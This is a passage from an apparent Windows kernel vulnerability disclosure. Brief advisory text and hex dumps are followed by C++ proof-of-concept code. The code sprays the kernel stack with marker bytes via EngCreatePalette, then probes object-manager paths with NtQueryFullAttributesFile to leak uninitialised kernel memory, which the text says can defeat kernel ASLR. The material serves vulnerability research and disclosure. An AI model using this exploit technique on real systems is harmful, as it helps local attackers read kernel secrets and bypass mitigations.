--- cut ---
In case of the \GLOBAL??\FltMgr device, the entire 56-byte memory area remains uninitialized, and is copied in that form to user-mode. See below:
--- cut ---
Name: \GLOBAL??\FltMgr, Status: 0
00000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030: 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? AAAAAAAA........
Name: \GLOBAL??\FltMgr\, Status: 0
00000000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000020: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00000030: 41 41 41 41 41 41 41 41 ?? ?? ?? ?? ?? ?? ?? ?? AAAAAAAA........
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <winternl.h>
#include <cstdio>
#pragma comment(lib, "ntdll.lib")
#define DIRECTORY_QUERY 0x0001
#define DIRECTORY_TRAVERSE 0x0002
// Output structure of NtQueryFullAttributesFile, declared locally.  Six 8-byte
// LARGE_INTEGERs plus one ULONG are 52 bytes of fields; with 8-byte alignment
// the type is 56 bytes, so the final 4 bytes are padding that the kernel has
// to initialise before the copy to user mode (the bytes this PoC inspects).
typedef struct _FILE_NETWORK_OPEN_INFORMATION {
    LARGE_INTEGER CreationTime;
    LARGE_INTEGER LastAccessTime;
    LARGE_INTEGER LastWriteTime;
    LARGE_INTEGER ChangeTime;
    LARGE_INTEGER AllocationSize;
    LARGE_INTEGER EndOfFile;
    ULONG FileAttributes;   // offset 48; bytes 52..55 of the struct are padding
} FILE_NETWORK_OPEN_INFORMATION, *PFILE_NETWORK_OPEN_INFORMATION;
// One entry of the array NtQueryDirectoryObject writes into its buffer.
// EnumerateDirectory() below walks the array until it meets an entry whose
// Name.Buffer is NULL and compares TypeName against L"Directory" to decide
// whether to recurse.
typedef struct _OBJECT_DIRECTORY_INFORMATION {
    UNICODE_STRING Name;
    UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, *POBJECT_DIRECTORY_INFORMATION;
// Native API prototypes used by this program; they resolve at link time from
// ntdll.lib (see the #pragma comment above).
extern "C" {
    // Fills FileInformation for the object named by ObjectAttributes without
    // handing back a handle.  This is the call whose output is examined for
    // uninitialised kernel stack bytes.
    NTSTATUS NTAPI NtQueryFullAttributesFile(
        _In_ POBJECT_ATTRIBUTES ObjectAttributes,
        _Out_ PFILE_NETWORK_OPEN_INFORMATION FileInformation
    );
    // Enumerates an object directory into Buffer as an array of
    // OBJECT_DIRECTORY_INFORMATION.  Context is the enumeration cursor;
    // RestartScan=TRUE starts from the first entry.
    NTSTATUS WINAPI NtQueryDirectoryObject(
        _In_ HANDLE DirectoryHandle,
        _Out_opt_ PVOID Buffer,
        _In_ ULONG Length,
        _In_ BOOLEAN ReturnSingleEntry,
        _In_ BOOLEAN RestartScan,
        _Inout_ PULONG Context,
        _Out_opt_ PULONG ReturnLength
    );
    // Opens an object-manager directory (e.g. "\") with DesiredAccess.
    NTSTATUS WINAPI NtOpenDirectoryObject(
        _Out_ PHANDLE DirectoryHandle,
        _In_ ACCESS_MASK DesiredAccess,
        _In_ POBJECT_ATTRIBUTES ObjectAttributes
    );
};
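// Dump dwBytes bytes starting at Buffer as a hex + ASCII listing, 16 bytes per
// row.  Row offsets are printed as 8 hex digits.  Positions past the end of
// the buffer in the last row are rendered as "??" (hex column) and "." (ASCII
// column) so every row keeps the same width.
VOID PrintHex(PVOID Buffer, ULONG dwBytes) {
    const BYTE *Data = (const BYTE *)Buffer;
    for (ULONG i = 0; i < dwBytes; i += 16) {
        // ULONG is unsigned long, so the 'l' length modifier is required for
        // the conversion to be well-defined; the printed digits are the same.
        printf("%.8lx: ", i);
        for (ULONG j = 0; j < 16; j++) {
            if (i + j < dwBytes) {
                printf("%.2x ", Data[i + j]);
            } else {
                printf("?? ");
            }
        }
        for (ULONG j = 0; j < 16; j++) {
            // Printable ASCII only; control bytes, high bytes and the
            // out-of-range tail all become '.'.
            if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
                printf("%c", Data[i + j]);
            } else {
                printf(".");
            }
        }
        printf("\n");
    }
}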
// Fill size bytes at ptr with byte, one byte at a time.  A hand-rolled loop
// rather than memset(); presumably so the fill of the marker buffer in
// SprayKernelStack() is not elided by the optimiser -- TODO confirm.
// size == 0 writes nothing.
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
    PBYTE end = ptr + size;
    while (ptr != end) {
        *ptr++ = byte;
    }
}
// Write a known marker into a stretch of the kernel stack just before the
// probed system call runs, so that bytes the kernel later copies out without
// initialising can be recognised (the 0x41 'A' bytes in the report above).
// The marker is delivered through gdi32!EngCreatePalette, resolved once via
// GetProcAddress; presumably the 256-entry colour table is copied onto the
// kernel stack on the way in, which is what leaves the 'A's there -- TODO
// confirm.  The user-mode copy is overwritten with 'B' afterwards, so 'A's in
// a later dump cannot have come from this user-mode buffer.
VOID SprayKernelStack() {
    static bool initialized = false;
    static HPALETTE(*EngCreatePalette)(
        _In_ ULONG iMode,
        _In_ ULONG cColors,
        _In_ ULONG *pulColors,
        _In_ FLONG flRed,
        _In_ FLONG flGreen,
        _In_ FLONG flBlue
    );
    if (!initialized) {
        // NOTE(review): neither LoadLibrary nor GetProcAddress is checked; a
        // NULL result would be called through below.
        EngCreatePalette = (HPALETTE(*)(ULONG, ULONG, ULONG *, FLONG, FLONG, FLONG))GetProcAddress(LoadLibrary(L"gdi32.dll"), "EngCreatePalette");
        initialized = true;
    }
    static ULONG buffer[256];   // 1 KiB of marker bytes
    MyMemset((PBYTE)buffer, 'A', sizeof(buffer));
    EngCreatePalette(1, ARRAYSIZE(buffer), buffer, 0, 0, 0);
    MyMemset((PBYTE)buffer, 'B', sizeof(buffer));
}
// Probe one object-manager path with NtQueryFullAttributesFile and, when the
// call wrote anything into the output structure, print all 56 bytes of it
// (trailing padding included) as a hex dump.  RootDirectory may be NULL for an
// absolute Path.  The output is zeroed and the kernel stack is sprayed with a
// marker first, so marker bytes in the dump are bytes the kernel never set.
// An output that is still all-zero after the call is skipped; Status is only
// printed together with a non-empty dump.
VOID QueryFile(HANDLE RootDirectory, PCWSTR Path) {
    UNICODE_STRING ObjectName;
    RtlInitUnicodeString(&ObjectName, Path);
    OBJECT_ATTRIBUTES Attributes;
    InitializeObjectAttributes(&Attributes, &ObjectName, OBJ_CASE_INSENSITIVE, RootDirectory, NULL);
    FILE_NETWORK_OPEN_INFORMATION Info;
    FILE_NETWORK_OPEN_INFORMATION Zero;
    RtlZeroMemory(&Info, sizeof(Info));
    RtlZeroMemory(&Zero, sizeof(Zero));
    SprayKernelStack();
    const NTSTATUS Status = NtQueryFullAttributesFile(&Attributes, &Info);
    if (memcmp(&Info, &Zero, sizeof(Info)) == 0) {
        return;
    }
    wprintf(L"Name: %s, Status: %x\n", Path, Status);
    PrintHex(&Info, sizeof(Info));
}
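// Recursively walk the object-manager namespace from `path` and call
// QueryFile() on every non-directory object, once with the bare name and once
// with a trailing backslash (both spellings appear in the report above).
// Directories that cannot be opened with DIRECTORY_QUERY | DIRECTORY_TRAVERSE
// are skipped silently.  Only the first batch returned by a single
// NtQueryDirectoryObject call (128 KiB buffer) is examined; directories with
// more entries than fit are presumably not fully visited -- TODO confirm.
VOID EnumerateDirectory(PWCHAR path) {
    HANDLE hdir = NULL;
    UNICODE_STRING name;
    RtlInitUnicodeString(&name, path);
    OBJECT_ATTRIBUTES attrs;
    InitializeObjectAttributes(&attrs, &name, 0, NULL, NULL);
    NTSTATUS st = NtOpenDirectoryObject(&hdir, DIRECTORY_QUERY | DIRECTORY_TRAVERSE, &attrs);
    if (!NT_SUCCESS(st)) {
        return;
    }
    const ULONG kMaxBufferSize = 128 * 1024;
    PBYTE buffer = (PBYTE)malloc(kMaxBufferSize);
    if (buffer == NULL) {
        // Allocation failure was previously passed to the kernel as a NULL buffer.
        NtClose(hdir);
        return;
    }
    // RestartScan=TRUE means the kernel sets Context, but never hand it an
    // uninitialised value.
    ULONG Context = 0;
    st = NtQueryDirectoryObject(hdir, buffer, kMaxBufferSize, FALSE, TRUE, &Context, NULL);
    if (NT_SUCCESS(st)) {
        POBJECT_DIRECTORY_INFORMATION pdi = (POBJECT_DIRECTORY_INFORMATION)buffer;
        // The returned array is terminated by an entry whose Name.Buffer is NULL.
        for (; pdi->Name.Buffer != NULL; pdi++) {
            WCHAR path_buffer[MAX_PATH];
            // Bounded formatting.  wsprintf() takes no size argument (and is
            // itself capped at 1024 characters), so a long nested name could
            // overrun this MAX_PATH stack buffer.  With _TRUNCATE, _snwprintf_s
            // returns -1 when the name does not fit instead of invoking the
            // invalid-parameter handler.
            int written;
            if (wcscmp(path, L"\\") == 0) {
                written = _snwprintf_s(path_buffer, ARRAYSIZE(path_buffer), _TRUNCATE, L"%s%s", path, pdi->Name.Buffer);
            } else {
                written = _snwprintf_s(path_buffer, ARRAYSIZE(path_buffer), _TRUNCATE, L"%s\\%s", path, pdi->Name.Buffer);
            }
            if (written < 0) {
                continue;   // too long: do not probe a truncated path
            }
            if (pdi->TypeName.Buffer != NULL && wcscmp(pdi->TypeName.Buffer, L"Directory") == 0) {
                EnumerateDirectory(path_buffer);
            } else {
                QueryFile(NULL, path_buffer);
                // Second probe with a trailing separator, only when the extra
                // character (plus terminator) still fits the buffer.
                if (wcslen(path_buffer) + 2 <= ARRAYSIZE(path_buffer)) {
                    wcscat_s(path_buffer, L"\\");
                    QueryFile(NULL, path_buffer);
                }
            }
        }
    }
    free(buffer);
    NtClose(hdir);
}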
// Entry point: walk the whole object namespace starting at the root directory
// "\" and print every probe whose output structure was not left all-zero.
int main() {
    EnumerateDirectory(L"\\");
    return 0;
}